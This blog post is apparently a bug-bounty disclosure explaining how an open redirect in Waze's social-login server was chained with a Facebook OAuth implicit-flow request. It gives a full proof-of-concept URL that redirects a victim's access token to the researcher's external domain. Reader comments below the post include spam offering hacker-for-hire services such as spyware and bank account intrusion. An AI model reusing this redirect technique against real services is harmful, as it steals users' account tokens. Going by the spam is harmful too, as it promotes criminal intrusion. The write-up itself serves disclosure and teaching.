Google VRP : oAuth token stealing.

Hey guys! hope you all doing well :), In June/July i decided to hunt on Google Products, As Google have almost everything in scope so i gone though list of Google products/fully integrated acquisitions. ( https://www.google.com/intl/en/about/products/ ), Waze is one of Google's Fully integrated acquisitions (There's difference b/w integrated and non-integrated). So i decided to give it a try :)

I was looking at Waze iOS app and there was an option to login with Twitter, Show i started capturing requests, The URL was like this;

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxxx

(not exactly this, feeling lazy to checkout again :P)

The flow works in same manner like `Authorization Code flow` as Twitter don't have `Implicit flow` (as far as i know)

1 - GET Request to http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx

2 - 302 Response to https://api.twitter.com/oauth/authorize?oauth_token=xxxxx&redirect_uri=http://www.waze.com/SocialMediaServer/redirect?redirect=http://somdomain.waze.com%3Fsession_cookies=xxxx&server=this&publish=false&on_close=false&community=twitter&lang=&deviceid=0&is_group=false

3 - After authorize, Redirect to http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3Fsession_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

4 - And then finally Redirect to http://somdomain.waze.com/twitter?session_cookies=xxxx&oauth_token==xxx&oauth_verifier=xxxxx

So everyone know what is suspicious here; http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3Fsession_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

Luckily yes it was vulnerable to open redirect we won the battle already :D but wait we're working with twitter `oauth_veriifier` which is not very usable from attacker perspective. Also twitter requires us to authorize app everytime :/

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx looking at 'id' , seems some more social connect possible, so i checked out android app as well and found facebook, linkedin are also there. Started testing on android, the flow for Facebook was completely different here. I started fuzzing around the old url, tried to replace Twitter to Facebook.

GET Request - http://www.waze.com/SocialMediaServer/social/connect?id=facebook&session_cookies=xxx

Response - 500 Error :(

But wait i seen many apps working in this pattern /social/*connection_name*/connect , Lets give it a try.

GET - http://www.waze.com/SocialMediaServer/social/facebook/connect?id=twitter&session_cookies=xxx

Response -302 :DDDDD,



Changed ?redirect=http://harshjaiswal.com  and response_type=token,signed_request

Final PoC :

https://m.facebook.com/v2.8/dialog/oauth?auth_type=rerequest&client_id=343050668156&default_audience=friends&redirect_uri=https://waze.com/SocialMediaServer/redirect?redirect=http://harshjaiswal.com&response_type=token,signed_request&return_scopes=true&scope=email,user_friends,user_events


Response -
http://harshjaiswal.com/?redirect=http://harshjaiswal.com#granted_scopes=user_events%2Cuser_friends%2Cemail%2Cpublish_actions%2Cpublic_profile&denied_scopes=&signed_request=XXXXXXX&access_token=EAAAATXXXXX&expires_in=6886


Although this was a fully integrated acq. i got less bounty :P as they still consider it as acquition FOR bounty purposes :(


But its okay! atleast i learned one thing, If they don't give you endpoint, try to guess it 3:)

I hope you like it. :)



2 comments:

  1. I DONT KNOW WHAT YOU HAVE BEEN THROUGH OR HOW LONG YOU HAVE BEEN LOOKING BUT THIS IS THE LAST STOP AS THERE IS A HACKER WHO CAN HELP YOU WITH SPY WARE ON YOUR CHEATING PARTNER OR UPGRADE YOUR SCHOOL SCORES OR HELP WITH RESULT AND CLEAR ANY CRIMINAL RECORD..

    HACKING OF FACEBOOK , EMAIL , AND BANK ACCOUNTS ARE HIS SPECIALTY.. EMAIL : GREENFR1007@GMAIL.COM OR SKYPE:SATISH.ANCHAN4

    BEST EVER

    ReplyDelete

  2. شركة غسيل خزانات بالمدينة المنورة و عمال مروبون وحاصلون على شهادة صحية فقط اتصل بنا لتحصل على افضل خدمة غسيل خزانات


    ReplyDelete

Powered by Blogger.